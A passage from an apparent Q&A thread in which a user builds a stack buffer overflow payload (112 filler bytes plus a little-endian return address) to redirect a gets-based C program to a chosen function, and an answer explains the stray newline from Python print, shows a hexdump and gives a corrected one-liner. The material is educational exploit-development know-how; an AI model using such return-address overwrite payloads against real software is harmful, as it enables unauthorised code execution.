2

I'm trying to provoke a buffer overflow in order to execute a function on C code. So far I already managed to find out what is the number of bytes to take over EBP register. The only thing next is to substitute the address of EIP to the function I wish to execute. I'm trying to generate this payload with python. For this I use the following 

python -c 'print "A"*112 + "\x3b\x86\x04\x08"'  > attack_payload

This is what I get

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA;�

Notice those last characters! I know that it's not what I was suppose to get. The address I wish to run on EIP register is 0804863b. I had to put this on little endian for the exploit to run properly. Any comments on this? Not being able to go further with the exploit because of this...

Improve this question
2
  • If you remove the > attack_payload is EIP successfully overwritten with your requested address? Commented Oct 8, 2017 at 18:39
  • @DKNUCKLES not sure how I would do that, without copying the file's content, because the code is expecting some input (string) to feed gets function. Commented Oct 8, 2017 at 21:14

1 Answer 1

Reset to default
2

I have no idea how you looked at your attack_payload file. But you should not just dump it to the terminal or look at it within some editor - since in this case the data will be interpreted as characters. Instead you should do some hexdump of the file, for example with xxd:

$ python -c 'print "A"*112 + "\x3b\x86\x04\x08"'  > attack_payload
$ xxd attack_payload 
00000000: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
...
00000060: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
00000070: 3b86 0408 0a                             ;....

As you can see in the last line, the bytes \x3b\x86\x04\x08 are actually mostly where you expected these. You probably did not expect the newline character \x0a (i.e. \n) at the end of the file but that's what a print in python adds. If you don't want this don't use print but:

$ python -c 'import sys; sys.stdout.write("A"*112 + "\x3b\x86\x04\x08")'  > attack_payload
Improve this answer
Sign up to request clarification or add additional context in comments.

4 Comments

I just cat the file and copied those chars into stdin (because a gets function is asking for a string on the program). I've seen this procedure in some tutorials. As an example, the output should look like this A(...)A<FA><84>^D^H when that command is executed. But what you're saying makes sense to me... Given that, are there anyways to deliver this payload to the gets function and overflow the buffer?
@fish202: if the application reads with gets from stdin just app < attack_payload or python -c '.... ' | app. But that's not really a security question but instead just how to feed data to applications stdin.
Sure, but I can't feed it directly like that. Please follow the link to the code.
@fish202: I would suggest that the problem is that the gets in stringLength gets only called if the correct option was selected - and your attack sequence does not account for selecting the option. Anyway, I've showed you what the problem is with creating the payload you want. Debugging your code and showing that the payload you've wanted is wrong in the first place is outside of this question.

Your Answer

By clicking “Post Your Answer”, you agree to our terms of service and acknowledge you have read our privacy policy.

Start asking to get answers

Find the answer to your question by asking.

Ask question

Explore related questions

See similar questions with these tags.